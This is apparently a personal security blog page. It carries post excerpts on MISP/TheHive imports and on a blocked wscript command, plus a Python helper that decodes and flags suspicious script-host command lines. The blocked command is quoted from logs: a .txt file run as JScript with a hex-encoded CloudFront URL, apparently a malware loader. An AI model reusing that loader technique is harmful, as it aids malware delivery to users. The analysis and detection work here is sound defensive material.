Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was…

importing wildfire reports into misp and thehive

I’m experimenting with thehive and associated projects (misp in particular) and will be describing some issues I run into & how I’ve fixed them (fingers crossed). One of the first things I tried was to import events from wildfire to misp. I found a package called pan-stix and installed it on my osx box. Running…

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe "C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" "68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk"

I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder:

68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574 = https://d274eq41c39r2n.cloudfront.net

According to…
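As an added example (not code from the post or from any vendor tool), here is a small Python helper that does the triage from the excerpt above in a repeatable way: it tokenizes a wscript/cscript command line as it would appear in a process-creation log, picks out the host switches (//B, //E:), decodes any argument that is a long run of hex bytes, and flags the two things visible in the blocked command, a hex-encoded URL argument and an engine override used to run a file whose extension WSH would not normally execute. The sample command lines are constructed; the backslashes in the path and the double hyphen before IsErIk are assumptions, since the page extraction altered those characters.

```python
import ntpath
import re
from urllib.parse import urlparse

# An argument made only of hex byte pairs, at least 8 bytes long.
HEX_ARG = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")

# Extensions Windows Script Host runs on its own; anything else needs //E:.
WSH_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}


def split_windows_cmdline(cmdline: str) -> list:
    """Split on whitespace while keeping double-quoted arguments together
    (quotes are stripped). Sufficient for WSH command lines from process logs."""
    tokens, current, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def decode_hex_arg(arg: str):
    """Return the decoded text if `arg` is a hex string that decodes to
    printable ASCII, otherwise None."""
    if not HEX_ARG.match(arg):
        return None
    try:
        text = bytes.fromhex(arg).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def analyze_wsh_cmdline(cmdline: str) -> dict:
    """Pull the script path, host switches and decoded arguments out of a
    wscript/cscript command line and flag the combinations worth a look."""
    tokens = split_windows_cmdline(cmdline)
    info = {"host": None, "script": None, "engine": None, "batch": False,
            "decoded": {}, "urls": [], "unusual_extension": False}
    if not tokens:
        info["suspicious"] = False
        return info
    info["host"] = ntpath.basename(tokens[0]).lower()
    for tok in tokens[1:]:
        if tok.startswith("//"):            # host switch: //B, //E:jscript, //nologo, ...
            switch = tok[2:]
            if switch.upper() == "B":
                info["batch"] = True        # batch mode: no prompts or error dialogs
            elif switch.upper().startswith("E:"):
                info["engine"] = switch[2:].lower()
            continue
        if info["script"] is None:          # first non-switch token is the script
            info["script"] = tok
            ext = ntpath.splitext(tok)[1].lower()
            info["unusual_extension"] = ext not in WSH_EXTENSIONS
            continue
        decoded = decode_hex_arg(tok)       # remaining tokens are script arguments
        if decoded is None:
            continue
        info["decoded"][tok] = decoded
        parsed = urlparse(decoded)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            info["urls"].append(decoded)
    # A hex-encoded URL argument, or an engine override used to run a file with a
    # non-script extension, is the pattern seen above; either alone is worth review.
    info["suspicious"] = bool(info["urls"]) or (
        info["engine"] is not None and info["unusual_extension"])
    return info


# Constructed samples. The first reconstructs the blocked command line from the
# post; the path separators and the double hyphen are assumed, since the page
# extraction altered those characters.
BLOCKED = (
    r'wscript.exe "C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" '
    r'"68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" '
    r'"//B" "//E:jscript" "--IsErIk"'
)
BENIGN = r'cscript.exe //nologo "C:\Scripts\inventory.vbs" prod'

if __name__ == "__main__":
    for line in (BLOCKED, BENIGN):
        result = analyze_wsh_cmdline(line)
        print(result["host"], result["script"], result["urls"],
              "SUSPICIOUS" if result["suspicious"] else "ok")
```

The engine override is the detail to key on: a .txt file is not something wscript will run by itself, so "//E:jscript" on a .txt path is a stronger signal than the hex argument alone, and it survives even when the loader stops hex-encoding its URL. The tokenizer deliberately does not handle escaped quotes or caret escapes; for command lines pulled from Sysmon or EDR telemetry that is usually enough, but treat it as a triage aid rather than a parser of record.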
